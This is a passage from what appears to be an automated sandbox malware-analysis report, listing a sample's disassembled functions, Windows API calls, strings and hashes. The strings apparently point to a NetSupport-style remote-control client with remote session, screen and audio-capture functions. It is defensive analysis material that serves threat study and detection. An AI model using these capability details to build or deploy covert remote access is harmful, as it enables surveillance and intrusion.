                                                                                        • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                      • _memset.LIBCMT ref: 1115B266
                                                                                      • SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
                                                                                      • ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
                                                                                      • GetDesktopWindow.USER32 ref: 1115B309
                                                                                      • TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2935161463-0
                                                                                      • Opcode ID: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                      • Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
                                                                                      • Opcode Fuzzy Hash: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                      • Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9
                                                                                      Function 11063160 Relevance: 149.1, APIs: 42, Strings: 43, Instructions: 353libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getlocalipaddressinuse), ref: 11063592
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                      • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                      • API String ID: 1096595926-1306570422
                                                                                      • Opcode ID: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                      • Instruction ID: 5f24de0e2360826035fa82522da9b4a10218173402b610a7b1cd1951dc97c3b7
                                                                                      • Opcode Fuzzy Hash: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                      • Instruction Fuzzy Hash: 96A15DBCF447927AD312AFB76C91FABFEE86F615D8B81042AF449E5901FA60F000C556
                                                                                      Function 11005360 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 11005435
                                                                                        • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                        • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                      • wsprintfA.USER32 ref: 1100548D
                                                                                      • DeleteObject.GDI32(?), ref: 110054E2
                                                                                      • DeleteObject.GDI32(?), ref: 110054EB
                                                                                      • SelectObject.GDI32(?,?), ref: 11005502
                                                                                      • DeleteObject.GDI32(?), ref: 11005508
                                                                                      • DeleteDC.GDI32(?), ref: 1100550E
                                                                                      • SelectObject.GDI32(?,?), ref: 1100551F
                                                                                      • DeleteObject.GDI32(?), ref: 11005528
                                                                                      • DeleteDC.GDI32(?), ref: 1100552E
                                                                                      • DeleteObject.GDI32(?), ref: 1100553F
                                                                                      • DeleteObject.GDI32(?), ref: 1100556A
                                                                                      • DeleteObject.GDI32(?), ref: 11005588
                                                                                      • DeleteObject.GDI32(?), ref: 11005591
                                                                                      • ShowWindow.USER32(?,00000009), ref: 110055BF
                                                                                      • PostQuitMessage.USER32(00000000), ref: 110055C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                      • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                      • API String ID: 2789700732-770455996
                                                                                      • Opcode ID: 545b59c5a20981a964d2566c076ce67725319314088b52aa60ee8a5e99a3c4b0
                                                                                      • Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
                                                                                      • Opcode Fuzzy Hash: 545b59c5a20981a964d2566c076ce67725319314088b52aa60ee8a5e99a3c4b0
                                                                                      • Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60
                                                                                      Function 110EB120 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • wsprintfA.USER32 ref: 110EB1B8
                                                                                      • GetTickCount.KERNEL32 ref: 110EB212
                                                                                      • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                      • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                      • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                      • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                      • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                      • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                      • API String ID: 3451743168-2289091950
                                                                                      • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                      • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                      • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                      • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                      Function 1100B310 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • _malloc.LIBCMT ref: 1100B366
                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                        • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,A1BC2D8B,?,00000000,00000000), ref: 1100AC84
                                                                                        • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                                                        • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
                                                                                        • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
                                                                                        • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
                                                                                        • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                                                        • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                                                        • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                                                      • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,A1BC2D8B,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                                                      • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                                                      • _calloc.LIBCMT ref: 1100B3E9
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                                                      • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                                                      • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                                                      Strings
                                                                                      • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                                                      • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                                                      • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                                                      • InitCaptureSounds NT6, xrefs: 1100B48E
                                                                                      • Audio, xrefs: 1100B347
                                                                                      • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                                                      • DisableSounds, xrefs: 1100B342
                                                                                      • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                      • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                      • API String ID: 1843377891-2362500394
                                                                                      • Opcode ID: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                      • Instruction ID: 3f9b0c4355a442be161718b687c517c7c1a8a488e2b9041c50d9e3709ff29e90
                                                                                      • Opcode Fuzzy Hash: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                      • Instruction Fuzzy Hash: 8E51D9B5E0464AAFE704CF74DC80BAEF7A4FB04759F10467AE929A3240E7717550C7A1
                                                                                      Function 1102B1D0 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 220COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • GetLastError.KERNEL32(?), ref: 1102B331
                                                                                      • GetLastError.KERNEL32(?), ref: 1102B38E
                                                                                      • _fgets.LIBCMT ref: 1102B3C0
                                                                                      • _strtok.LIBCMT ref: 1102B3E8
                                                                                        • Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034
                                                                                      • _fgets.LIBCMT ref: 1102B424
                                                                                      • _strtok.LIBCMT ref: 1102B438
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                      • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                      • API String ID: 78526175-1484737611
                                                                                      • Opcode ID: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                      • Instruction ID: 83a04ffa2f5f23a923324f4189043cfd8b751997b231b4d3af7dc0cd534076c2
                                                                                      • Opcode Fuzzy Hash: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                      • Instruction Fuzzy Hash: 2E81B675D00A1E9BDB10DBA4CC80FEEB7B9AF44309F4440D8E919A7245EA75AB84CF91
                                                                                      Function 11031160 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 245sleepwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,A1BC2D8B,00000000,00000000,00000000), ref: 1103119A
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • EnumWindows.USER32(110301B0,00000001), ref: 11031272
                                                                                      • EnumWindows.USER32(110301B0,00000000), ref: 110312CC
                                                                                      • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313
                                                                                        • Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
                                                                                        • Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
                                                                                        • Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
                                                                                        • Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
                                                                                        • Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
                                                                                        • Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E
                                                                                      • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
                                                                                      • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
